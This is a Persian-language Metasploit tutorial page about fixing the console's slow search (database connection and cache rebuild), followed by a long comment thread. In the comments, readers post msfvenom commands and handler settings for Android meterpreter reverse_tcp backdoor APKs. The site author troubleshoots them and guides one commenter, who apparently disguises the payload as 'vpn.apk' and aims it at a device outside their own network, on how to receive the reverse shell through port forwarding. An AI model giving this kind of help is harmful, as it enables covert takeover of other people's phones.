رفع مشکل جستجو در کنسول متااسپلوییت

منتشر شده در دسته : متااسپلوییت مقدماتی

بروز مشکل در متااسپلوییت در حین استفاده در صورت نداشتن تجربه کافی , مسئله رایجی است . پس از نصب متااسپلوییت به منظور دسترسی به آن (دسترسی به کنسول متااسپلوییت که درباره آن مفصل صحبت خواهیم کرد) ، کافی است خط فرمان کالی لینوکس را باز کنید و دستور msfconsole را درون آن وارد کنید . در صورتی که کنسول را با کاربری غیر از کاربر روت اجرا می‌کنید مطمئن شوید که قبل از آن دستور sudo را اضافه کنید تا دستور با دسترسی ادمین اجرا شود . پس از اجرا کنسول متااسپلوییت برای شما نمایش داده می‌شود .
ما در اینجا یک مشکل در متااسپلوییت که نسبتا هم رایج است را بررسی می‌کنیم . در درس‌های بعدی از دستور search به منظور جستجو اکسپلوییت ها و دیگر ماژول ها استفاده خواهیم کرد .

مشکل در متااسپلوییت

در برخی مواقع پس از نصب کالی لینوکس و یا حتی اجرا متااسپلوییت بر روی دیگر سیستم‌ها شما قادر به استفاده از قابلیت جستجوی سریع نخواهید بود . فرض کنید که می‌خواهیدdcom را مشابه دستور زیر جستجو کنید :

search dcom

ولی به محض وارد کردن این دستور با پیام خطای زیر مواجه می‌شوید :

[!] Database not connected or cache not built, using slow search

این پاسخ دو امکان را مطرح می‌کند .

  • اول اینکه ممکن است فریم ورک متااسپلوییت شما به پایگاه داده خود که از نوع postgresql می‌باشد متصل نشده است .
  • دوم اینکه کش متااسپلوییت ایجاد نشده است .

برای حل این مشکل بایستی اول بررسی کنیم و اطمینان پیدا کنیم که فریم ورک متااسپلوییت ما به پایگاه داده خود متصل شده است یا خیر . به این منظور دستور db_status را درون کنسول متااسپلوییت وارد کنید . در صورتی که با پیام زیر مواجه شدید به این معنی است که فریم ورک شما به پایگاه داده خود متصل است و دیگر نیاز به انجام گام اول که در زیر توضیح می‌دهیم نخواهید داشت :

[*] postgresql connected to msf3

شاید هم متصل نباشد :

رفع مشکل جستجو در کنسول متااسپلوییت

در صورتی که postgresql با متااسپلوییت متصل نباشد گام اول را مطابق زیر اجرا کنید :

گام اول : در صورت که فریم ورک متااسپلوییت به پایگاه داده متصل نباشد ، شما بایستی سرویس metasploit و postgresql را شروع کنید . به این منظور خط فرمان لینوکس را باز کنید و دستورهای زیر را اجرا کنید :

sudo service postgresql start

sudo service metasploit start

با اجرای دو دستور فوق سرویس های Metasploit و postgresql آغاز می‌شود . پس از اجرای این دو دستور به منظور پایدارسازی و دایمی کردن تنظیمات اعمال شده بایستی دو دستور زیر را درون خط فرمان وارد نمایید :

update-rc.d postgresql enable

update-rc.d metasploit enable

رفع مشکل جستجو در کنسول متااسپلوییت

 

پس از اجرای این دو دستور با وارد کردن دستور msfconsole درون خط فرمان به کنسول بازگردید . به منظور تست دوباره از اینکه اتصال بین فریم ورک و پایگاه داده برقرار شده است یا خیر دستور db_status را دوباره وارد کنید .

رفع مشکل جستجو در کنسول متااسپلوییت

 

گام دوم : امکان دوم این بود که کش ایجاد نشده است . برای رفع این مشکل دستور db_rebuild_cache را درون کنسول متااسپلوییت وارد کنید . این دستور در پس زمینه اجرا خواهد شد و اجرای آن مدتی طول خواهد کشید . پس از اجرای این دستور از جستجوی سریع ماژول ها و اکسپلوییت ها در محیط متااسپلوییت لذت خواهید برد .

رفع مشکل جستجو در کنسول متااسپلوییت

رفع مشکل جستجو در کنسول متااسپلوییت

صاحب امتیاز نت آموز : نویسنده , مدرس و متخصص در زمینه امنیت شبکه های رایانه ای

تعداد پیام ها 47

  1. Database not connected or cache not built, using slow search
    سلام و ممنون از راهنماییتون وقتی search dcom می زنم Database not connected or cache not built, using slow search این پیام و می ده … و وقتی این کد وارد می کنم msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 R> andro.apk
    یه ارور به صورت bash: msfpayload: command not found
    می ده … لطفا راهنمایی کنید

    1. سلام خطای اول به خاطر غیرفعال بودن قابلیت
      جستجو سریع می باشد که در بالا به صورت کامل نحوه فعال سازی آن شرح داده شده .
      خطای دوم به خاطر اینه که دستور msfpayload و msfencode در تاریخ 08-06-2015 منسوخ شده است و این دو ابزار با هم ادغام شده و از این پس بایستی از ابزار جدیدی با نام msfvenom استفاده کنید .

  2. با سلام ، من در کالی با استفاده از دستوری که در عکس مشخصه یک پیلوآد برای اندروید ایجاد کردم ، منتهی بعد از ایجاد فایل با پسوند apk چند ارور ظاهر شد ، و زمانی که فایل رو بر روی موبایل اندرویدیم اجرا میکنم ، در مرحله پایانی نصب یک ارور ظاهر میشه و نمیتونم از گوشیم شل بگیرم ، قبلا با دستور msfpayload به راحتی این کارو انجام میدادم اما از زمانی که msfvenom جای گزین این دستور شده ، نتونستم دسترسی بگیرم ، دستوری که در متا اسپلویت ویندوزم وارد میکنم هم اینه :
    use multi/handler
    set PAYLOAD android/meterpreter/reverse_tcp
    set LHOST 192.168.1.100
    set LPORT 5432

    1. سلام
      نحوه ایجاد پیلود برای اندروید درسته . اون خطاها اولیش اینه که پلتفورم اندروید رو انتخاب نکردید که باید با سوییچ platform– تعیین بشه ولی مهم نیست چونکه سیستم به صورت پیش فرض پلتفورم اندروید رو انتخاب می کنه . پیام دوم میگه که هیچ arch یا همان معماری اجرایی انتخاب نشده و پیام سوم می گه که هیچ انکودری تعیین نشده که انکودر را با سوییچ e- باید تعیین کنید و همچنین کاراکترهای بد حذف نشده انده که باید از سوییچ b- استفاده کنید . اینکه شما به شل دسترسی پیدا نمی کنید میتونه مسدود بودن پورت یا مشکل ریداریکت پورت درون شبکه باشه
      در ضمن در حین ایجاد پیلود یک آیپی لوکال استفاده کردی که برای اجرا هم باید همون آیپی رو استفاده کنی

  3. با عرض سلام و خسته نباشید و تشکر از مطلب بسیار مفیدتون
    من یه مشکلی دارم خیلی لطف میکنین اگه کمک کنین
    من این دستور رو میزنم
    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.26 LPORT=8080 R –format=apk > /root/Desktop/test.apk
    فایل تست ایجاد میشه اما با حجم 0 بایت و اصلا قابل اجرا نیست
    شما میدونین دلیل چیه؟

    1. سوییچ format رو کلا حذف کن نیازی بهش نیست فرمت رو خودش از روی نوع پیلود تشخیص میده . شماره پورت لوکال هم بزار روی یک شماره تصادفی تست کن

      msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.26 LPORT=5555 R > /root/Desktop/test.apk

  4. با سلام
    شما گفتین که ار این به بعد باید از دستور msfvenum استفاده کنیم ولی بازهم پیام command not found به من میده میشه راهنمایی کنید

  5. سلام خسته نباشین.. من یه پیلود ساختم که بتونم از گوشی شل بگیرم منتهی نمیدونم چرا وقتی پیلود رو توی گوشی نصب میکنم شل نمیگریره

    1. سلام

      Metasploit Community / Pro no longer ships in Kali

      At the request of Rapid7, we have removed the Metasploit Community / Pro package from Kali Linux and now host the open-source metasploit-framework package only. For all of you who require Community or Pro, you will now need to download it from Rapid7 and then register and submit your personal details in order to get a license. In addition, the Rapid7 team no longer maintains the Metasploit package in Kali, which has brought with it some substantial changes – we’ve moved to a “native” setup, where rather than bundling all the required software needed to run Metasploit in one big package, we use native dependencies within Kali to support the metasploit-framework package. This results in a faster, smoother work experience and easier integration with Metasploit dependencies. For more information about this, check out our Metasploit Framework in Kali documentation page.

      در متااسپلوییت نسخه 2 به بعد دیگر نسخه Community و Pro متااسپلوییت موجود نیست .
      این کار به درخواست کمپانی Rapid7 انجام شده
      اکنون تنها بسته متن باز فریم ورک متااسپلوییت روی کالی قرار دارد
      اگر نیاز به بسته Community یا PRo متااسپلوییت دارید بایستی ابتدا آن را از سایت Rapid7 دانلود کنید و سپس اطلاعات مورد نیاز را ثبت کرده تا رجیستر کرده و لایسنس دریافت کنید.
      نیازی به نصب نسخه Pro یا Community ندارید و کالی بسته های آپدیت رو به صورت محلی خودش ارایه می کند

      برای شروع و استفاده از کنسول متااسپلوییت بایستی دستورات زیر را وارد کنید :

      شروع پایگاه داده
      etc/init.d/postgresql start/
      یا
      service postgresql start

      مقداردهی اولیه پایگاه داده
      msfdb init

      بازکردن کنسول
      msfconsole

      موفق باشید

  6. x86/shikata_ga_nai succeeded with size 5907 (iteration=193)
    x86/shikata_ga_nai succeeded with size 5936 (iteration=194)
    x86/shikata_ga_nai succeeded with size 5965 (iteration=195)
    x86/shikata_ga_nai succeeded with size 5994 (iteration=196)
    x86/shikata_ga_nai succeeded with size 6023 (iteration=197)
    x86/shikata_ga_nai succeeded with size 6052 (iteration=198)
    x86/shikata_ga_nai succeeded with size 6081 (iteration=199)
    x86/shikata_ga_nai chosen with final size 6081
    Payload size: 6081 bytes
    Error: No such file or directory @ rb_sysopen – /usr/share/calc.exe
    با سلا و خسته نباشید و تشکر از سات و آموزش های تک تون
    من هر چی درست می کنم با دستورات شما این ارور نشون میده ؟؟
    no such file or directory
    ممنون میشم کمک کنید
    با تشکر

  7. سلام خسته نباشین دوستان..
    یه راهنمایی میخواستم؟؟
    دوست عزیز من این دستور رو میزنم ولی باز خطای نو ارچ..انکودر و نو پلاتفرم رو میده.
    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.26 LPORT=5555 R > /root/Desktop/test.ap
    اگه میشه لطف کنین به ایمیلم هم جواب رو بفرستین
    .ممنونم از سایت خوبتان.

  8. سلام مهندس شریعتی..
    من پورت های مورد نظر را در کالی و پورت فرواردینگ رو چطوری بازکنم؟؟؟
    تو کالی از iptables استفاده کردم و در مودم از نات ولی باز جواب ندادن…
    البته من فک میکنم مشکل اصلی خطای بالا باز نبودن پورت ها هس..
    میشه یه راهنمایی کنین..
    ممنونم

    1. سلام
      لطفا فقط سوال مرتبط با موضوع مطرح کنید
      از ارسال پیاپی پیام خودداری کنید در غیراینصورت به صورت خودکار بلاک خواهید شد
      سوالات غیرمرتبط با موضوع را از طریق بخش پشتیبانی علمی مطرح کنید.
      سوال و خود را شفاف توضیح دهید
      با تشکر

  9. سلام به همگی..
    میشه راهنمایی کنید که مشکل این کدچیه که فایل رو نمیسازه؟؟؟
    msfpayload android/meterpreter/reverse_tcp LHOSt=lp lport=4444 x > file.apk

    ولی در بالا به جای اندروید که ویندوز رو زدم تونستم از ویندوز شل و دسترسی بگیرم…ولی برای اندروید حتی فایل رو هم نمیسازه…
    ممنون میشم که راهنمایی کنین..

    1. سلام
      لطفا یکبار کامنت های همین بخش را کامل مطالعه فرمایید. این سوال قبلا مطرح شده

      خطای دوم به خاطر اینه که دستور msfpayload و msfencode در تاریخ ۰۸-۰۶-۲۰۱۵ منسوخ شده است و این دو ابزار با هم ادغام شده و از این پس بایستی از ابزار جدیدی با نام msfvenom استفاده کنید .

  10. کامنتها رو مشاهده کردم این فرق میکنه ..چون اون بالا نه برا ویندوز کار میکنه نه برای اندروید…
    ولی با بک ترک تست کردم این برا ویندوز کار کرد..ولی برا اندروید جواب نداد..
    پیغام خطاش هم اینه=invalid payload :android/meterpreter/reverse_tcp

    شرمنده که رو اعصابتون را میرم..به هر حال معذرت….

  11. خواهش می کنم این چه حرفیه
    خب msfvenom فکر نکنم در بک ترک وجود داشته باشه و باید از همون msfpayload استفاده کنید.
    فکر کنم دستور درست واسه اندروید در msfpayload به صورت زیر باشه :

    msfpayload android/meterpreter/reverse_tcp LHOST=ip LPORT=port R > payload.apk

    اگر امکانش هست یک تصویر کامل از دستوری که اجرا می کنید و خطای دریافتی هم پیوست کنید.

  12. سلام دوستان …
    مهندس من تونستم برا اندروید بکدور رو ایجاد کنم البته بدون خطا وقتی تو رنج ایپی هست میتونم دسترسی بگیرم از گوشی..
    وقتی وای فای گوشی رو قطع میکنم با دیتا به اینترنت وصل میشم دیگه دسترسی نمیگیره حتی خطا هم نمیده ..در ضمن این دفه بکدور رو با ایپی پابلیکم میسازم.با دستور msfvenom -p
    ممنون میشم اگه یه راهنمایی کنین..

  13. سلام
    من تمام مراحل انجام دادم مو به مو ای پی ست شد
    پورت ست کردم اما در اخر تا این قسمت گیر میکنم
    Starting the payload handler
    فایل درون گوشی نصب میکنم اجرا میکنم اما بی نتیجه ست

    1. سلام گرامی
      تا اونجایی که بنده اطلاع دارم این مطلب مربوط به رفع مشکل جستجو در متاسپلوییت هست . بماند که دوستان سوالات متفرقه مطرح کردند و بهتر بود در مطلب مرتبط سوال خود را می پرسیدند.
      شما کدام آزمایش را انجام دادید و به مشکل برخوردید؟
      لطفا بفرمایید دستورالعمل کدام مطلب را مو به مو انجام دادید تا بنده بتونم راهنماییتون کنم.
      تا حد امکان سوالاتی که مرتبط با مطالب نیستند را از طریق پشتیبانی علمی مطرح کنید.
      ممنون از توجه شما. موفق باشید

      1. msfvenom -p android/meterpreter/reverse_tcp LHOST=37.32.??.??? LPORT=4444 R > ??????.apk
        ls
        ========
        msfconsole
        use exploit/multi/handler
        set PAYLOAD android/meterpreter/reverse_tcp
        set LHOST 192.168.0.105
        set LPORT 4444

        show options

        exploit

        همه این روش رو رفتم و به این مرحله ک در عکس هست رسیدم. آیا درون فایل vpn.apk باید کارایی انجام بدم
        مرسی

        1. سلام
          نیاز به دستکاری فایل پیلود نیست.
          اینطور که من متوجه شدم شما قصد دارید تا فایل اندروید رو برای سیستمی خارج از شبکه داخلی خودتون با آدرس آیپی …37.32 ارسال کنید
          تمام مراحل را درست انجام دادید. فقط اینکه به منظور دریافت شل بازگشتی بایستی داخل مودم خودتون تنظیمات پورت فورواردینگ رو انجام دهیدتا بسته بازگشتی از سیستم هدف هدایت شده و به سیستم کالی برگرده.
          من قبلا هم گفتم http://netamooz.net/metasploit-online-pentest بهتره که از یک محیط تست آنلاین استفاده کنید تا تنظیم پورت فورواردینگ.

    1. سرویس ابری امازون نیاز به کارت اعتباری داره. شما می تونید یک وی پی اس دبیان خریداری کنید و بسته های مورد کالی رو خودتون بر روی اون نصب کنید یا اینکه از شرکت های واسط وی پی اس اماده کالی رو خریداری کنید.
      اگر سوال دیگری دارید فقط از فرم زیر ارسال کنید.
      http://netamooz.net/technical-support
      سوالات غیر مرتبط با این محتوا تایید نخواهند شد.
      سپاس از توجه شما

  14. سلام خدمت شما.ممنون میشم بگین مشکلش بخاطر چیه
    [email protected]:~# service postgresql start
    کد بالا رو میزنم هیچ اتفاقی نمیفته. بعدش کد زیر رو وارد میکنم اون خطا رو میده
    [email protected]:~# service metasploit start
    Failed to start metasploit.service: Unit metasploit.service not found.

    1. سلام

      Metasploit Community / Pro no longer ships in Kali

      At the request of Rapid7, we have removed the Metasploit Community / Pro package from Kali Linux and now host the open-source metasploit-framework package only. For all of you who require Community or Pro, you will now need to download it from Rapid7 and then register and submit your personal details in order to get a license. In addition, the Rapid7 team no longer maintains the Metasploit package in Kali, which has brought with it some substantial changes – we’ve moved to a “native” setup, where rather than bundling all the required software needed to run Metasploit in one big package, we use native dependencies within Kali to support the metasploit-framework package. This results in a faster, smoother work experience and easier integration with Metasploit dependencies. For more information about this, check out our Metasploit Framework in Kali documentation page.

      در متااسپلوییت نسخه 2 به بعد دیگر نسخه Community و Pro متااسپلوییت موجود نیست .
      این کار به درخواست کمپانی Rapid7 انجام شده
      اکنون تنها بسته متن باز فریم ورک متااسپلوییت روی کالی قرار دارد
      اگر نیاز به بسته Community یا PRo متااسپلوییت دارید بایستی ابتدا آن را از سایت Rapid7 دانلود کنید و سپس اطلاعات مورد نیاز را ثبت کرده تا رجیستر کرده و لایسنس دریافت کنید.
      نیازی به نصب نسخه Pro یا Community ندارید و کالی بسته های آپدیت رو به صورت محلی خودش ارایه می کند

      برای شروع و استفاده از کنسول متااسپلوییت بایستی دستورات زیر را وارد کنید :

      شروع پایگاه داده
      etc/init.d/postgresql start/
      یا
      service postgresql start

      مقداردهی اولیه پایگاه داده
      msfdb init

      بازکردن کنسول
      msfconsole

      اینکه فرمودید با وارد کردن service postgresql start هیچ اتفاقی رخ نمی دهد . خیر در پس زمینه سرویس مربوط شروع می شود. می توانید با دستور stop به جای start اون رو متوقف کنید یا با status وضعیت رو در هر کدام از حالت ها مشاهده کنید

      service postgresql start
      service postgresql stop
      service postgresql status

      موفق باشید

  15. باسلام خدمت دوستان و استادان عزیز

    بنده نرم افزار متااسپلویت رو یک ساله میخوام نصب کنم ولی نمیشه، خواستم موانعی که پیش میاد رو با شما عزیزان به اشتراک بذارم ،امیدوارم کارم راه بیفته
    اولین مانع:برای نصب ارور میده میگهthe selected folder is not empty.pleas select a diffrent folder

نظرات غیرمرتبط با محتوای این مطلب تایید نخواهند شد.

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *